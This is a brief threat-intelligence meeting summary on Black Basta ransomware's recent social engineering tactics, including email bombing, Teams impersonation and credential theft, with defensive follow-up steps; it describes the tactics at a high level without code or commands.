December 9, 2024 at 01:18PM
Black Basta ransomware is evolving its tactics, utilizing social engineering and various malware like Zbot and DarkGate since October 2024. The group employs email bombing, impersonation on Microsoft Teams, and QR codes to target users. Their ultimate aim includes credential harvesting and VPN file theft for further breaches.
### Meeting Takeaways: Dec 09, 2024 – Threat Intelligence / Malware
**Black Basta Ransomware Update:**
– **Tactics Change:** Black Basta ransomware actors are experimenting with new social engineering techniques and using payloads like Zbot and DarkGate since October 2024.
– **Email Bombing:** Targets are bombarded with emails by signing them up for multiple mailing lists before the threat actor makes contact.
**Initial Contact Methods:**
– **Microsoft Teams Interactions:** Attackers impersonate IT staff or support personnel on Microsoft Teams to initiate contact.
– **Remote Access Software Use:** Victims are encouraged to install legitimate remote access software (e.g., AnyDesk, TeamViewer) which then allows the attackers to deploy further malicious payloads.
**Technical Approach:**
– **Reverse Shell Usage:** Attempts to leverage OpenSSH client for establishing reverse shells and sending malicious QR codes to steal credentials.
– **Credential Harvesting:** The ultimate goal following access is quick enumeration of the environment and credential exfiltration, including VPN configuration files.
**Black Basta Evolution:**
– **Origin:** Emerged as an independent group after the shutdown of Conti in 2022, shifting from QakBot to more sophisticated social engineering strategies.
– **Malware Variants:** Utilizes various bespoke malware families including KNOTWRAP, KNOTROCK, DAWNCRY, PORTYARD, and COGSCAN for its operations.
**Broader Cybersecurity Context:**
– **Ransomware Variants:** Other ransomware groups, including Akira and Rhysida, are also evolving their tactics. Rhysida is using typosquatted domains and SEO poisoning to trick users into downloads of infected software disguised as legitimate applications.
**Next Steps:**
– **Enhanced Awareness:** Continuous monitoring of evolving threats and adapting security measures accordingly.
– **User Education:** Inform users about the risks of interacting with unknown contacts, especially in corporate environments.
### Follow-Up Actions:
– Stay updated with the latest threat intelligence reports.
– Review and bolster email security protocols to defend against email bombing.
– Educate teams on identifying phishing tactics and secure remote access practices.